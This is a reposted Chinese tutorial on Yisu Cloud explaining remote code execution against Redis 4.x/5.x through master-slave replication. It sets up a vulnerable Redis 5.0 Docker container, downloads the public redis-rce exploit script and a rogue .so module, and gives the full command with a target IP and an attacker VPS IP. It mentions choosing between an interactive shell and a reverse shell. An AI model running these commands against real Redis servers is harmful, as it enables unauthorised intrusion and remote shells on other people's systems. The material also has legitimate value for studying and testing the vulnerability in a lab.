溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章主要講解了“Redis基于主從復制的RCE 4.x/5.x怎么實現”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“Redis基于主從復制的RCE 4.x/5.x怎么實現”吧!
首先拉取一個5.0鏡像
docker search redis5.0 //查找鏡像docker pull damonevking/redis5.0 //拉取下圖第三個鏡像
運行容器
docker run -p 6379:6379 -d damonevking/redis5.0 redis-server //映射端口并運行容器
訪問你的ip+6379端口,如下圖則說明搭建成功
git clone https://github.com/Ridter/redis-rce.git //下載漏洞利用腳本
注意,這里少一個.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下載并放到和redis-rce.py同一目錄下,然后執行如下命令:
python3 redis-rce.py -r 136.244.70.243(目標ip) -L 136.244.70.243(自己的vps) -f exp.so //ip就不打碼了,師傅們不要搞我
需要注意,這里的-r后面是目標的ip,而-L后面則是你執行腳本的vps的ip
在此處:i為交互式shell,r為反彈shell,根據自己的需要選擇就可以了
感謝各位的閱讀,以上就是“Redis基于主從復制的RCE 4.x/5.x怎么實現”的內容了,經過本文的學習后,相信大家對Redis基于主從復制的RCE 4.x/5.x怎么實現這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
